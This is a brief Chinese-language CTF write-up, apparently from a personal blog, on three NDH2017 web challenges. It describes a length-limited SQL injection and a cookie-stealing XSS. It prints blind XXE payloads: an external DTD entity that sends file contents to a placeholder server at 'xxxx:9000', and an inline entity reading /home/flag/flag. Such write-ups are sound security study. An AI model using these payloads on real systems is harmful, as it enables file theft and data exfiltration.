NDH2017-Web-Writeup
尴尬==假期休息就没做题,等到想做的时候队友都做完了,题不算难,就写下自己做的几个题的过程:
Divide and rule
题目很明了,serach那里有注入,然后应该是可以注到user跟pass,然后在login处登录:
测试的时候发现每个输入框有长度限制,于是可以利用拼接的方式达到注入的目的XD:
但是有一点比较恶心,就是限制长度之后...感觉只能去猜表明列名了...
这里倒比较好猜,列名即是users,字段名经过猜测之后发现是login&password:
然后md5破解进去登录拿到flag:
Purple Posse Market
职业病犯了==感觉想抓人...
一个没有丝毫过滤的xss==
xss平台或者自己vps上简单写一个获取cookie的js脚本就OK,没截图就不放了...
No Pain No Gain
一个blindXXE的题目:
一开始还以为是个啥洞,最后想想才75分,应该是个xxe没跑了。
在vps上放一个xml文件:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxxx:9000/?file=%file;'>">
然后flag在/home/下...
又是没截图...
赛后发现自己做的其实麻烦了,主要是因为当时自己的xxe写法出了点小问题...当时只是在xml内定义了,在外面却忘记改了名字导致没成功><
<!DOCTYPE data [ <!ENTITY test SYSTEM "file:///home/flag/flag" > ]>
id,name,email
1,&test;,[email protected]
OK:
事实告诉我们,做题时候要随手截图QAQ
为您推荐了相关的技术文章:
原文链接: www.venenof.com